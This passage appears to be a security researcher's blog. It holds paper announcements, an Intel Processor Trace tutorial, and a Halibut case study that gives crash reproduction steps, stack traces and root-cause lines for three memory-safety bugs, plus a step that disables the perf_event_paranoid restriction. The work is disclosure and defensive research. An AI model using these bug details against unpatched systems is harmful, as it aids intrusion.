Carter Yagemann

AI Psychiatry to Appear in USENIX'24

2024-05-09T10:35:00-04:00

My coauthors and I will be presenting the paper "AI Psychiatry: Forensic Investigation of Deep Learning Networks in Memory Images" at USENIX 2024 in August. Below is a preview of the abstract:

Online learning is widely used in production to refine model parameters after initial deployment. This opens several vectors for covertly launching attacks against deployed models. To detect these attacks, prior work developed black-box and white-box testing methods. However, this has left a prohibitive open challenge: how the investigator is supposed to recover the model (uniquely refined on an in-the-field device) for testing in the first place. We propose a novel memory forensic technique, named AiP, which automatically recovers the unique deployment model and rehosts it in a lab environment for investigation. AiP navigates through both main memory and GPU memory spaces to recover complex ML data structures, using recovered Python objects to guide the recovery of lower-level C objects, ultimately leading to the recovery of the uniquely refined model. AiP then rehosts the model within the investigator's device, where the investigator can apply various white-box testing methodologies. We have evaluated AiP using three versions of TensorFlow and PyTorch with the CIFAR-10, LISA, and IMDB datasets. AiP recovered 30 models from main memory and GPU memory with 100% accuracy and rehosted them into a live process successfully.

CheatFighter to Appear in RAID'23

2023-07-21T09:20:00-04:00

My coauthors and I will be presenting the paper "Extracting Threat Intelligence From Cheat Binaries For Anti-Cheating" at RAID 2023 in October. Below is a preview of the abstract:

Rampant cheating remains a serious concern for game developers who fear losing loyal customers and revenue. While numerous anti-cheating techniques have been proposed, cheating persists in a vibrant (and profitable) illicit market. Inspired by novel insights into the economics behind cheat development and recent techniques for defending against advanced persistent threats (APTs), we propose a fully automated methodology for extracting "cheat intelligence" from widely distributed cheat binaries to produce a "memory access graph" that guides selective data randomization to yield immune game clients. We have implemented a prototype system for Android and Windows games, CheatFighter, and evaluated it on 86 cheats collected from a variety of real-world sources, including Telegram channels and online forums. CheatFighter successfully counteracts 80 of the real-world cheats in under a minute, demonstrating practical end-to-end protection against widespread cheating.

A Practical Beginner's Guide to Intel Processor Trace

2023-02-24T07:00:00-05:00

Greetings! If you're reading this tutorial, chances are you have some interest in Intel Processor Trace (PT) and how it can improve your debugging or program analysis capabilities, but aren't sure how to get started. This is understandable, given that there aren't many practical tutorials on Intel PT and what documentation is publicly available is scattered across Intel specifications, Linux documentation, and nuggets of text in various smaller projects. The existing text targets a vast range of audiences, ranging from low-level driver developers to experienced software engineers. Most, if not all, of that text is not newcomer-friendly, and it's easy to spend hours sifting through it only to find your basic questions unanswered.

With this in mind, I've written this tutorial to fulfill two goals. The first is to get newcomers up and running with Intel PT in as few steps as possible. This is a hands-on tutorial for people who want to quickly get hacking. In the process, I hope to also reveal to you what makes Intel PT so powerful and why it's my go-to technology for any project involving dynamic program analysis. My second goal is to then point you to the various sources of more technical information with prefaces of what you'll find in each destination, so you can focus your exploration based on your ultimate needs and higher goals.

So with all that clarified, let's dive in.

Background: What is Intel PT?

If you stumbled upon this tutorial by chance and have no clue what Intel PT is, let's start with some background information and a bit of history. Readers who already know about Intel PT or don't care for a history lesson should skip to the next section.

Intel PT is one of a long line of hardware features developed and released by Intel to help developers gain better insights into how their software runs on Intel processors for debugging and performance profiling. If you're using an Intel processor built within the past decade, chances are it includes Intel PT.

Intel PT is a spiritual successor to technologies like hardware performance counters. Performance counters are an excellent solution if you want to know statistical information about the performance behaviors of a particular piece of code, like how often it encounters cache misses, but performance counters can't tell you much at a per-instruction granularity.

Intel PT aims to address this shortcoming by providing execution traces as opposed to just a set of counter registers. Each trace is a stream of packets representing different events, such as whether a branch was taken, how many processor cycles have elapsed, and so forth. These packets are flushed directly into physical memory, asynchronously, bypassing all caches, to enable recording of traces with minimal impact to the target program.

The original intended purpose of Intel PT was to enable advanced debugging and profiling of performance-sensitive code. Intel PT yields precise information about executed instruction sequences, timing, and even energy consumption, to accurately record software behaviors without the overhead or artifacts that instrumentation code would introduce, such as cache interference. However, while Intel PT was originally intended for debugging and profiling, it is also an extremely powerful tool for guiding program analysis, which is why I use it extensively in my security research projects. Unlike any other technique currently available, Intel PT enables me to transparently observe feasible paths and timing information for real-world executions with only about a 2% performance impact to the target program. It can also successfully yield traces in many tricky programs that break instrumentation tools like Intel Pin or DynamoRIO. This makes it my go-to technology for collecting data to fuel my security solutions.

Getting Started: Linux Perf

The fastest way to start using Intel PT is to set up a Linux computer with an Intel CPU and install Perf. Note that at the time of writing, Intel PT does not play nicely with virtual machines or containers, so you'll need a computer that runs Linux as its native operating system. I'm going to walk through the steps using a Debian system, but the same steps should work for Ubuntu or (with a bit of tweaking) any other Linux system.

Step 1: Install Perf. Most Linux distributions include Perf as a package that can be installed via the default package manager. For Debian, you can install it by opening a terminal and running:

sudo apt install linux-perf

Be aware that since this package installs an additional kernel driver with some beefy startup behaviors, you may need to reboot your system at this point before proceeding.

Step 2: Verify Intel PT is available. Once Perf is installed, we should verify that it can access Intel PT. We can check this with the perf list command:

$ perf list | grep intel_pt
  intel_pt//                                         [Kernel PMU event]

If the above command prints no lines, then it means either your CPU doesn't have Intel PT or it provides a very old version that lacks all the features required to work with Perf.

Step 3: Adjust paranoid mode. By default, Perf only allows root to use Intel PT because it reveals a lot of information about traced programs. If you want to allow any user to access Intel PT, you can temporarily disable this restriction by running the command:

echo -1 | sudo tee /proc/sys/kernel/perf_event_paranoid

If you want to permanently disable it, you can add the following line to /etc/sysctl.conf:

kernel.perf_event_paranoid=-1

If you decide to leave this setting at its default level, be aware that you'll need to run the subsequent commands in this tutorial as root (or use sudo).

Step 4: Recording traces. We can record traces using the perf record command. For this tutorial, I'll use /bin/ls as my target program. Let's start with the most basic tracing:

$ perf record -e intel_pt//u -- /bin/ls
perf.data
[ perf record: Woken up 1 times to write data ]
[ perf record: Captured and wrote 0.043 MB perf.data ]

In this example, perf record is how I tell Perf I want to record something, -e intel_pt specifies that I want to record an Intel PT trace, //u specifies that I want to record only the user space portion of the program's execution (Intel PT can also record kernel execution) using the default Intel PT settings (more on this later) and then everything after the -- is the command that'll be executed and traced.

You'll notice that Perf prints some extra messages after the program finishes executing with useful information like how big the final trace is. Be aware that it is possible for a program to generate too much data for Intel PT and Perf to flush to storage in time, in which case the trace will contain holes. Perf's messages will warn you if this occurs.

If everything ran successfully, you should now have a perf.data file in your current working directory. This file contains the Intel PT trace along with some sideband data recorded by Perf's driver. This sideband records things like where objects were mapped into memory and when context switches between tasks occurred, which is needed in order to recover the executed instruction sequence and untangle threads if your target program runs on multiple CPU cores simultaneously.

Step 5: Decoding and recovery. In Intel PT terminology, we first have to decode the perf.data file to extract the trace of Intel PT events, and then combine that with the recorded sideband to recover the instruction execution sequence. Fortunately, Perf comes with scripts that can do this all for us in one step.

The simplest (and in my opinion, most useful) command is the following:

perf script --insn-trace

Note that by default, perf script tries to read ./perf.data. If your Perf output file is in another location or has a different name, you can specify its path using the -i flag.

This script recovers and prints the exact sequence of instructions our target program executed. Specifically, each line has the following format:

    ls         832828     [027]      8105202.171292271:     7fa2165d4c22    do_system+0x372 (/usr/lib/x86_64-linux-gnu/libc-2.31.so)    insn: 31 c0
^Executable^ ^Task ID^ ^CPU Core #^ ^Estimated Timestamp^ ^Virtual Address^ ^Symbol Offset^              ^Object^                    ^Instruction Bytes^

With this information, we now know the exact order instructions were executed, where those instructions resided in memory, how to map those instructions back to the original program and library files, and more. We can then use this information to, for example, build control flow graphs and other representations for program analysis.
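If you want to feed these lines into your own analysis, a small parser is usually the first step. The following is a minimal Python sketch that assumes every line follows the layout of the sample above (executable, task ID, CPU core, timestamp, address, symbol offset, object, instruction bytes). The names LINE_RE, InsnRecord, and parse_insn_line are my own and not part of Perf, and real traces may contain lines this pattern does not cover (for example, executable names with spaces), which the function simply reports as None.

```python
import re
from typing import NamedTuple, Optional

# Assumed layout, taken only from the sample line in this tutorial:
#   comm  tid  [cpu]  timestamp:  address  symbol+offset (object)  insn: bytes
LINE_RE = re.compile(
    r"^\s*(?P<comm>\S+)\s+"
    r"(?P<tid>\d+)\s+"
    r"\[(?P<cpu>\d+)\]\s+"
    r"(?P<time>\d+\.\d+):\s+"
    r"(?P<addr>[0-9a-f]+)\s+"
    r"(?P<sym>\S+)\s+"
    r"\((?P<obj>[^)]*)\)\s+"
    r"insn:\s+(?P<insn>(?:[0-9a-f]{2}\s*)+)$"
)


class InsnRecord(NamedTuple):
    comm: str        # executable name
    tid: int         # task ID
    cpu: int         # CPU core number
    timestamp: str   # kept as text to avoid losing nanosecond digits in a float
    address: int     # virtual address of the instruction
    symbol: str      # symbol plus offset, e.g. do_system+0x372
    obj: str         # object (file) the instruction was mapped from
    insn: bytes      # raw instruction bytes


def parse_insn_line(line: str) -> Optional[InsnRecord]:
    """Parse one line of instruction trace output, or return None if it does not match."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    return InsnRecord(
        comm=m["comm"],
        tid=int(m["tid"]),
        cpu=int(m["cpu"]),
        timestamp=m["time"],
        address=int(m["addr"], 16),
        symbol=m["sym"],
        obj=m["obj"],
        insn=bytes.fromhex("".join(m["insn"].split())),
    )


# The sample line from this tutorial.
SAMPLE = (
    "    ls         832828     [027]      8105202.171292271:     7fa2165d4c22"
    "    do_system+0x372 (/usr/lib/x86_64-linux-gnu/libc-2.31.so)    insn: 31 c0"
)
```

Calling parse_insn_line(SAMPLE) returns a record whose fields can be grouped by task ID or object, which is a reasonable starting point for building control flow graphs.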

If this is too granular for your desired use case, there are also other options that process the trace into coarser representations. For example, --call-trace will print only the function calls (along with their call depth), which you can use to extract a call graph for the execution. You can access the full manual for perf script by running man perf-script.

Additional Noteworthy Tricks

Disassembling instructions. You may have noticed that our instruction trace prints the raw bytes of the instructions instead of printing them in nice human-readable assembly. This is because in order to disassemble them, Perf needs access to a disassembler. Specifically, Perf integrates with Xed, which is Intel's official disassembler.

Unfortunately, the default APT repositories for Debian don't include a Xed package, so we'll need to compile and install Xed manually. Here's one way I've found to do this:

git clone https://github.com/intelxed/xed.git xed
git clone https://github.com/intelxed/mbuild.git mbuild
cd xed
./mfile.py examples
sudo cp ./obj/wkit/bin/xed /usr/local/bin/xed

Now that we've installed Xed, we can use the --xed flag with perf script:

perf script --insn-trace --xed

And now the instruction bytes are replaced with human-readable assembly.
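If you end up scripting this step, it can help to assemble the command in one place. Here is a minimal Python sketch that only uses the flags covered in this tutorial (--insn-trace, --xed, and -i). The function names build_perf_script_argv and run_perf_script are hypothetical helpers of my own, not part of Perf.

```python
import subprocess
from typing import List, Optional


def build_perf_script_argv(data_path: Optional[str] = None, xed: bool = False) -> List[str]:
    """Assemble a perf script command line using only flags from this tutorial."""
    argv = ["perf", "script"]
    if data_path is not None:
        # -i overrides the default input file, ./perf.data
        argv += ["-i", data_path]
    argv.append("--insn-trace")
    if xed:
        # --xed requires the xed binary to be installed and on the PATH
        argv.append("--xed")
    return argv


def run_perf_script(data_path: Optional[str] = None, xed: bool = False) -> str:
    """Run the command and return its standard output as text."""
    result = subprocess.run(
        build_perf_script_argv(data_path, xed),
        check=True,
        capture_output=True,
        text=True,
    )
    return result.stdout
```

Keeping the argument list separate from the call that executes it makes it easy to print or log the exact command before running it on a large trace.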

Adjusting timestamp accuracy. As I pointed out in Step 5, part of the output from perf script --insn-trace includes an estimated timestamp of when each instruction executed. I emphasize the word estimated because the accuracy of this timestamp depends on how frequently we configure Intel PT to record timing packets.

To keep this tutorial concise, I won't go into the details of what the different timing packets are and their trade-offs, but I'll show you how to adjust them as an example of how to change Intel PT settings in perf record. We can specify any non-default Intel PT settings like so:

$ perf record -e intel_pt/cyc=1,cyc_thresh=0/u -- /bin/ls
perf.data
[ perf record: Woken up 1 times to write data ]
[ perf record: Captured and wrote 0.074 MB perf.data ]

In this case, I've added cyc=1, which enables the generation of CYC timing packets by Intel PT, and cyc_thresh=0, which tells Intel PT to output these packets as frequently as possible. If you look closely, you'll notice the trace size has grown from 0.043 MB to 0.074 MB (roughly 1.7 times larger) as a result, so be mindful of this when deciding how accurate you need the timestamps to be.
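To compare settings across several runs, you can pull the size out of Perf's summary line and compute the growth yourself. This is a small Python sketch that assumes the summary always has the "Captured and wrote N MB" form seen in the two runs in this tutorial. The names CAPTURE_RE and captured_mb are my own.

```python
import re

# Matches the size in Perf's summary, e.g. "Captured and wrote 0.043 MB perf.data"
CAPTURE_RE = re.compile(r"Captured and wrote (?P<mb>\d+(?:\.\d+)?) MB")


def captured_mb(perf_output: str) -> float:
    """Return the trace size in MB reported by perf record."""
    m = CAPTURE_RE.search(perf_output)
    if m is None:
        raise ValueError("no 'Captured and wrote' summary found")
    return float(m["mb"])


# The two summary lines shown in this tutorial.
DEFAULT_RUN = "[ perf record: Captured and wrote 0.043 MB perf.data ]"
CYC_RUN = "[ perf record: Captured and wrote 0.074 MB perf.data ]"

# Ratio of the trace size with CYC packets to the default trace size.
growth = captured_mb(CYC_RUN) / captured_mb(DEFAULT_RUN)
```

For the two runs above, growth works out to about 1.72, so enabling CYC packets at the highest frequency cost roughly 72% more trace data for this particular program.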

If we now rerun perf script --insn-trace, we'll see that the estimated timestamp updates more frequently; however, it still isn't updated after every instruction. This is due to a limitation of Intel PT, but the specifics are outside the scope of this tutorial.

One final useful bit of information regarding timing: if we add -F+ipc to our perf script command, it'll periodically print out fields like IPC: 4.14 (29/7). IPC stands for instructions per cycle, and in this example, it's saying that the previous 29 instructions executed in 7 clock cycles. This gives us a bit more insight into how the timestamps are changing.
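The relationship between the three numbers in that field is simple division, which the following Python sketch makes explicit. It assumes the field always looks like the IPC: 4.14 (29/7) example above. The names IPC_RE and parse_ipc are my own.

```python
import re
from typing import Optional, Tuple

# Matches fields shaped like "IPC: 4.14 (29/7)"
IPC_RE = re.compile(
    r"IPC:\s*(?P<ipc>\d+(?:\.\d+)?)\s*\((?P<insns>\d+)/(?P<cycles>\d+)\)"
)


def parse_ipc(text: str) -> Optional[Tuple[int, int, float]]:
    """Return (instructions, cycles, instructions per cycle), or None if absent."""
    m = IPC_RE.search(text)
    if m is None:
        return None
    insns = int(m["insns"])
    cycles = int(m["cycles"])
    if cycles == 0:
        # Guard against division by zero on unexpected input
        return None
    return insns, cycles, insns / cycles


# The example field from this tutorial: 29 instructions in 7 cycles.
example = parse_ipc("IPC: 4.14 (29/7)")
```

Here 29 divided by 7 is approximately 4.14, which matches the value Perf printed.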

VulChecker Accepted to USENIX 2023

2022-09-23T10:35:00-04:00

My coauthors and I will be presenting our work on detecting bugs in source code using machine learning at USENIX Security 2023. Below is a preview of the abstract:

In software development, it is critical to detect vulnerabilities in a project as early as possible. Although deep learning has shown promise in this task, current state-of-the-art methods cannot classify and identify the line on which the vulnerability occurs. Instead, the developer is tasked with searching for an arbitrary bug in an entire function or even larger region of code.

In this paper, we propose VulChecker: a tool that can precisely locate vulnerabilities in source code (down to the exact instruction) as well as classify their type (CWE). To accomplish this, we propose a new program representation, program slicing strategy, and the use of a message-passing graph neural network to utilize all of the code's semantics and improve the reach between a vulnerability's root cause and manifestation points.

We also propose a novel data augmentation strategy for cheaply creating strong datasets for vulnerability detection in the wild, using free synthetic samples available online. With this training strategy, VulChecker was able to identify 24 CVEs (10 from 2019 & 2020) in 19 projects taken from the wild, with nearly zero false positives compared to a commercial tool that could only detect 4. VulChecker also discovered an exploitable zero-day vulnerability, which has been reported to developers for responsible disclosure.

PUMM Accepted to USENIX 2023

2022-09-02T20:00:00-04:00

My coauthors and I will be presenting our work on preventing use-after-free and double free vulnerabilities at USENIX Security 2023. Below is a preview of the abstract:

Critical software is written in memory unsafe languages that are vulnerable to use-after-free and double free bugs. This has led to proposals to secure memory allocators by strategically deferring memory reallocations long enough to make such bugs unexploitable. Unfortunately, existing solutions suffer from high runtime and memory overheads. Seeking a better solution, we propose to profile programs to identify units of code that correspond to the handling of individual tasks. With the intuition that little to no data should flow between separate tasks at runtime, reallocation of memory freed by the currently executing unit is deferred until after its completion; just long enough to prevent use-after-free exploitation. To demonstrate the efficacy of our design, we implement a prototype for Linux, PUMM, which consists of an offline profiler and an online enforcer that transparently wraps standard libraries to protect C/C++ binaries. In our evaluation of 40 real-world and 3,000 synthetic vulnerabilities across 26 programs, including complex multi-threaded cases like the Chakra JavaScript engine, PUMM successfully thwarts all real-world exploits, and only allows 4 synthetic exploits, while reducing memory overhead by 52.0% over prior work and incurring an average runtime overhead of 2.04%.

Differentiating ARCUS (USENIX'21) and Bunkerbuster (CCS'21)

2022-08-31T13:00:00-04:00

I've received several questions recently about two papers I published in 2021, one at USENIX (which I'll refer to here as ARCUS) and another at CCS (which I'll refer to as Bunkerbuster). You can find these papers at the USENIX and CCS conference websites, respectively.

The question people have is: what makes these two publications distinct from each other? In short, how do I justify ARCUS and Bunkerbuster being two separate publications? This question is motivated by both papers being published in the same year, with aesthetically similar architecture diagrams, and my decision to ultimately merge the codebases together into a single repository. Did I pull the wool over the eyes of the reviewers (and my dissertation defense committee)? Were my advisors asleep at the wheel? These are legitimate questions to ask, so let me address them here.

For busy readers who want to get straight down to the technical brass tacks, here is the commit where ARCUS and Bunkerbuster were merged so the research community can interrogate the roughly 5,600 additions that Bunkerbuster contributed to the prior ARCUS codebase. To summarize the difference in 1 sentence: ARCUS (the first prototype) is a reactive system that requires traces containing exploits to be cherry-picked by preexisting defenses, whereas Bunkerbuster (the second prototype) is a proactive bug hunting system that can sift through 10 times more data, that does not contain exploits, to find and help fix bugs, hopefully before attackers can find and exploit them in-the-wild.

For those who wish to read on, I'll break down my high-level explanation into 3 sections: the story of how ARCUS was created, how the findings and unsolved problems in ARCUS then inspired the creation of Bunkerbuster, and the timeline and hidden logistics surrounding their publications.

ARCUS' Story

At its essence, ARCUS (the earlier of the two prototypes) tackles a simpler problem than Bunkerbuster. Specifically, in the ARCUS work, my collaborators and I wrestle with how to diagnose alerts generated by host-based defenses like intrusion detection systems or control flow integrity monitors. ARCUS is a purely reactive system that relies on other defenses to accurately feed it execution traces (captured using Intel Processor Trace) that contain low-level binary exploits. In short, ARCUS has no exploration capabilities and its performance is directly dependent on the false negative rate of whichever preexisting defenses ARCUS is integrated with. If an exploit goes undetected, ARCUS offers no assistance.

This is a strong prerequisite, but it was necessary in order to simplify the research problem enough to focus on the core technical contribution of inventing and demonstrating binary symbolic root cause analysis. To be clear, no research occurs in a vacuum. The idea of binary symbolic analysis builds on a wealth of prior knowledge, such as the Mayhem work published in 2012. However, accurately following real-world Intel PT recordings symbolically, defining and implementing reliable detection techniques for multiple classes of memory safety bug (buffer/integer overflow, use-after-free, double free, format string), and then figuring out how to leverage the recovered constraints to classify the root cause and propose a preliminary patch, convinced my peers and reviewers that ARCUS was a publication-worthy work, despite its narrow scope.

One other curious finding came out of the ARCUS work: it discovered 4 new vulnerabilities during the evaluation, even though it was analyzing traces containing known exploits. This caught us by surprise and became the kindling for a follow-up work: Bunkerbuster.

Bunkerbuster's Story

The goal of Bunkerbuster was to address all the shortcomings left behind by ARCUS. Gone is the prerequisite of there being preexisting defenses on the monitored system. In fact, we even removed the assumption that only 1 system is being monitored. Instead, we aimed to make Bunkerbuster a proactive, end-to-end bug hunting system, driven by benign recordings of production and end-user workloads to find and fix bugs before an attacker could even attempt exploitation in-the-wild. ARCUS was handed the needle (exploit) by a deus ex machina (preexisting defenses). Bunkerbuster would have to search the haystack.

Flowery analogies aside, what does that really mean at a technical level? First, in Bunkerbuster, we could no longer tiptoe around exploration. Unless Bunkerbuster could branch out into states not reached by the input traces, the chances of finding bugs from recordings of benign executions would be significantly reduced. To accomplish this, we created a new plugin class for guiding state exploration (while controlling state explosion) and designed and implemented search heuristics based on our domain expertise of memory safety bugs.

Second, Bunkerbuster had to sift through significantly more Intel PT data than ARCUS ever did because it was looking at benign executions rather than malicious ones cherry-picked by a host-based defense. In empirical terms, the dataset Bunkerbuster was evaluated on is 10 times larger than the ARCUS dataset, creating a noisy digital haystack. Bunkerbuster overcomes this challenge, which would cripple ARCUS, using an on-the-fly hashing and snapshotting technique that we describe in the CCS paper.

Timeline and Publication Logistics

The time to develop ARCUS (minus evaluation and paper writing) was about 1.5 years. Developing Bunkerbuster took an additional 1 year. So why did the papers appear to be published so close together? The answer is conference review cycles.

ARCUS was originally submitted to USENIX 2020, and then was resubmitted to USENIX 2021 as a major revision. This significantly inflated the time to publication, even after all the technical work on ARCUS was completed.

Conversely, because my collaborators and I had already gone through the hardships of publishing ARCUS, when we wrote the Bunkerbuster paper, we were able to avoid many similar pitfalls and address likely reviewer critiques upfront. The result was that Bunkerbuster was accepted to CCS 2021 without major revision, which significantly reduced its time to publication compared to ARCUS.

In other words, when I gave my talk at USENIX 2021 on ARCUS, I was describing a system that had been finished over 1 year prior. For what it's worth, I'm currently involved in 2 papers that were submitted to USENIX 2022, but ended up in major revisions that were resubmitted to USENIX 2023. Should the reviewers accept these revisions, by the time my collaborators and I give our conference talks, we will be describing systems we built when I was still a PhD student, except I will now be 1 full year into my assistant professorship at The Ohio State University. I point this out not to raise a fuss about USENIX's review process, but just to emphasize that ARCUS' slow publication timeline is not a one-time anomaly. It's just the reality of large-scale peer review.

Conclusion

Hopefully this clarifies the question surrounding the publication of ARCUS and Bunkerbuster in 2021. I'm happy to answer additional questions that the community may have, and lastly I'd like to thank the readers who made it to the end of this text.

Happy hacking!

Update Regarding Halibut Bugs (CVE-2021-42612, CVE-2021-42613, CVE-2021-42614)

2022-06-03T11:45:00-04:00

The bugs that I found using ARCUS in Halibut last year have been issued 3 CVE IDs: CVE-2021-42612, CVE-2021-42613, and CVE-2021-42614.

To the best of my knowledge, these bugs are now fixed in the latest release version, which at the time of writing is 1.3. Please refer to Halibut's project website for more details.

Faculty Position at The Ohio State University

2022-03-13T10:40:00-04:00

I have accepted an offer to become an Assistant Professor at The Ohio State University, starting in the Fall 2022 semester.

I am currently looking to hire 1 Ph.D. student as a full-time graduate research assistant (GRA). If you are an incoming student and you're interested in cutting edge techniques for automatically finding and fixing severe software vulnerabilities, let's have a chat. You can find my email address in this publication.

Case Study: Security Analysis of Halibut

2021-10-12T17:30:00-04:00

Over the past year I've been studying memory corruption vulnerabilities in Linux C/C++ programs, culminating in the open sourcing of a framework called ARCUS to find and explain them automatically using a combination of dynamic tracing and symbolic analysis. My work has led to two academic conference publications, one that appeared in this year's USENIX Security Symposium and another that will appear next month at ACM CCS.

Since then, I've been going through the Debian Popularity Contest and analyzing packages, leading to the discovery of vulnerabilities like CVE-2021-42006. In this post, I'd like to share 3 new vulnerabilities I've discovered in a program called Halibut, which is a document preparation system that currently sits at Rank 54,752 (by number of installs) out of 182,832 packages in the popularity contest.

Environment

I'm using the latest official release of Halibut, version 1.2, which is available on Debian Bullseye and Ubuntu Hirsute, to name a few Linux distributions. The target architecture is x86-64.

Double Free in `cleanup_index()` in `index.c`

Steps to Reproduce:

Download the PoC.
Run: halibut --winhelp poc-halibut-winhelp-df

Stack Trace:

#0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1  0x00007ffff7e1c537 in __GI_abort () at abort.c:79
#2  0x00007ffff7e75768 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7f83e2d "%s\n") at ../sysdeps/posix/libc_fatal.c:155
#3  0x00007ffff7e7ca5a in malloc_printerr (str=str@entry=0x7ffff7f861c8 "double free or corruption (fasttop)") at malloc.c:5347
#4  0x00007ffff7e7dd55 in _int_free (av=0x7ffff7fb5b80 <main_arena>, p=0x5555556a5500, have_lock=0) at malloc.c:4266
#5  0x00005555555784c5 in sfree (p=0x5555556a5510) at ../malloc.c:63
#6  0x000055555557867d in free_word_list (w=0x5555556ab7b0) at ../malloc.c:130
#7  0x0000555555589fd6 in cleanup_index (i=0x5555556a2390) at ../index.c:203
#8  0x0000555555578154 in main (argc=0, argv=0x7fffffffe468) at ../main.c:404

Use-After-Free in `cleanup_index()` in `index.c`

Steps to Reproduce:

Download the PoC.
Run: halibut --text poc-halibut-text-uaf

Stack Trace:

#0  __GI___libc_free (mem=0x100000001) at malloc.c:3102
#1  0x00005555555784c5 in sfree (p=0x100000001) at ../malloc.c:63
#2  0x000055555557867d in free_word_list (w=0x7000700070007) at ../malloc.c:130
#3  0x000055555557869a in free_word_list (w=0x5555556f1900) at ../malloc.c:132
#4  0x0000555555589fd6 in cleanup_index (i=0x5555556a2390) at ../index.c:203
#5  0x0000555555578154 in main (argc=0, argv=0x7fffffffe478) at ../main.c:404

Note: This is not the same vulnerability as the one above. Notice the recursion inside free_word_list and how the PoC triggers a segmentation fault rather than a double free abort.

Use-After-Free in `info_width_internal()` in `bk_info.c`

Steps to Reproduce:

Download the PoC.
Run: halibut --info poc-halibut-info-uaf

Stack Trace:

#0  info_width_internal (words=0x5555556e92a0, xrefs=1, cfg=0x7fffffffdf80) at ../bk_info.c:974
#1  0x000055555559c419 in info_width_internal_list (words=0x5555556e92a0, xrefs=1, cfg=0x7fffffffdf80) at ../bk_info.c:953
#2  0x000055555559c669 in info_width_internal (words=0x5555556ed5b0, xrefs=1, cfg=0x7fffffffdf80) at ../bk_info.c:1009
#3  0x000055555559c776 in info_width_xrefs (ctx=0x7fffffffdf80, words=0x5555556ed5b0) at ../bk_info.c:1041
#4  0x000055555557b0cb in wrap_para (text=0x5555556ed5b0, width=66, subsequentwidth=66, widthfn=0x55555559c751 <info_width_xrefs>, ctx=0x7fffffffdf80, natural_space=0) at ../misc.c:328
#5  0x000055555559cab8 in info_para (text=0x5555556e8440, prefix=0x5555556a2d30, prefixextra=0x5555555c859c L".", input=0x5555556bcf80, keywords=0x5555556e1cd0, indent=1, extraindent=3, width=66, 
    cfg=0x7fffffffdf80) at ../bk_info.c:1120
#6  0x000055555559b38a in info_backend (sourceform=0x5555556a7dd0, keywords=0x5555556e1cd0, idx=0x5555556a2390, unused=0x0) at ../bk_info.c:579
#7  0x0000555555578119 in main (argc=0, argv=0x7fffffffe478) at ../main.c:398

Root Cause

According to ARCUS, the root cause appears to be frees that occur within get_token in input.c. Specifically, it labels Line 416:

        if (rsc.text) {
            in->pushback_chars = dupstr(rsc.text + prevpos);
            sfree(rsc.text);
        }

And Line 469:

    } else if (c == '{') {             /* tok_lbrace */
        ret.type = tok_lbrace;
        sfree(rsc.text);
        return ret;

There are several other lines in get_token that also call sfree and might be problematic.

Bunkerbuster to Appear in CCS'21

2021-09-06T13:00:00-04:00

My coauthors and I will be presenting the paper "Automated Bug Hunting With Data-Driven Symbolic Root Cause Analysis" at CCS 2021. Below is a preview of the abstract:

The increasing cost of successful cyberattacks has caused a mindset shift, whereby defenders now employ proactive defenses, namely software bug hunting, alongside existing reactive measures (firewalls, IDS, IPS) to protect systems. Unfortunately, the path from hunting bugs to deploying patches remains laborious and expensive, requires human expertise, and still misses serious memory corruptions. Motivated by these challenges, we propose bug hunting using symbolically reconstructed states based on execution traces to achieve better detection and root cause analysis of overflow, use-after-free, double free, and format string bugs across user programs and their imported libraries. We discover that with the right use of widely available hardware processor tracing and partial memory snapshots, powerful symbolic analysis can be used on real-world programs while managing path explosion. Better yet, data can be captured from production deployments of live software on end-host systems transparently, aiding in the analysis of user clients and long-running programs like web servers.

We implement a prototype of our design, Bunkerbuster, for Linux and evaluate it on 15 programs, where it finds 39 instances of our target bug classes, 8 of which have never before been reported and have led to 1 EDB and 3 CVE IDs being issued. These 0-days were patched by developers using Bunkerbuster’s reports, independently validating their usefulness. In a side-by-side comparison, our system uncovers 8 bugs missed by AFL and QSYM, and correctly classifies 4 that were previously detected, but mislabeled by AddressSanitizer. Our prototype accomplishes this with 7.21% recording overhead.

The code and data for this project will be made available on my public GitHub account.

MARSARA to Appear in CCS'21

2021-08-31T17:00:00-04:00

My coauthors and I will be presenting a paper on "Validating the Integrity of Audit Logs Against Execution Repartitioning Attacks" at CCS 2021. Below is a preview of the abstract:

Provenance-based causal analysis of audit logs has proven to be an invaluable method of investigating system intrusions. However, it also suffers from dependency explosion, whereby long-running processes accumulate many dependencies that are hard to unravel. Execution unit partitioning addresses this by segmenting dependencies into units of work, such as isolating the events that processed a single HTTP request. Unfortunately, we discover that current designs have a semantic gap problem due to how system calls and application log messages are used to infer complex internal program states. We demonstrate how attackers can modify existing code exploits to control event partitioning, breaking links in the attack and framing innocent users. We also show how our techniques circumvent existing program and log integrity defenses.

We then propose a new design for execution unit partitioning that leverages additional runtime data to yield verified partitions that resist manipulation. Our design overcomes the technical challenges of minimizing additional overhead while accurately connecting low level code instructions to high level audit events, in part with the use of commodity hardware processor tracing. We implement a prototype of our design for Linux, MARSARA, and extensively evaluate it on 14 real-world programs, targeted with expertly crafted exploits. MARSARA’s verified partitions successfully capture all the attack provenances while only reintroducing 2.82% of false dependencies, in the worst case, with an average overhead of 8.7%. Using a new metric called Partitioning Attack Surface, we show that MARSARA eliminates 47,642 more repartitioning gadgets per program than integrity defenses like CFI, demonstrating our prototype’s effectiveness and the novelty of the attacks it prevents.

"Modeling Large-Scale Manipulation in Open Stock Markets" to Appear in IEEE Security & Privacy

2021-05-26T14:00:00-04:00

An article my coauthors and I wrote on automated large-scale market manipulation will be appearing in the November issue of IEEE Security & Privacy. It is currently available early access here. Below is the abstract:

This article studies the feasibility of using a botnet to automate stock market manipulation, incorporating data from U.S. Securities and Exchange Commission case files, security surveys of online retail brokerage accounts, and dark web marketplace listings.

ARCUS System and Dataset Released

2021-02-08T11:00:00-05:00

We have released the source code and evaluation dataset for "ARCUS: Symbolic Root Cause Analysis of Exploits in Production Systems," which will be appearing at USENIX Security 2021 in August, 2021.

The paper will be ready for publication in about a month.

Vulnerability Root Cause Analysis Approach "ARCUS" to Appear in USENIX'21

2020-12-12T10:00:00-05:00

My coauthors and I will be presenting a paper "ARCUS: Symbolic Root Cause Analysis of Exploits in Production Systems" at USENIX Security 2021 in August, 2021. Below is a preview of the abstract:

